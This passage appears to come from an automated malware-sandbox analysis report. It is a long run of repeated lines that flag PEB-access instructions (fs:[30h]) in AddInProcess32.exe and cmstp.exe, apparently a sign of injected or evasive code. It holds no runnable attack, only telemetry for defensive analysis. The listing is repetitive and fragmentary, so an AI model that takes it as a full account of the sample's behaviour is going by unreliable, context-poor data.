          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01343B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01343B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01344BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01344BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01344BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01342397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01328794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01397794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01397794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01397794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013CD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01321B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01321B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013CFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01354A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01354A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01315210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01315210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01315210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01315210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01333A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01348E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01328A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0135927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013DEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013A4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01319240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01319240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01319240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01319240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01342AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01358EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013CFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01342ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F08CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F01074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E50050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E50050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04EB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04F0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04EC41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E4D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04EE8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04EB69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E61DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04EB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E6A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E5C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E62990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E6FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E3C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E3B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E5C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E5B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E73D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04EB3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E57D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04F08D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E54120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E3AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E6513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04EBA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E62AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E78EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04F08ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E62ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04EEFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04EB46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E4AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04F00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E6FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04ECFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E6D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E4766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04EEB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04F08A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E7927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04EC4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E3E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04EEFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E68E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E48A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E53A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E6A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04EB53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04F05BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04EF138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E41B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04EED380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E48794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E62397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E6B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04EB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E3DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E4FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04F08F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E63B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E3DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E4EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04F08B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 17_2_04E3F358 mov eax, dword ptr fs:[00000030h]
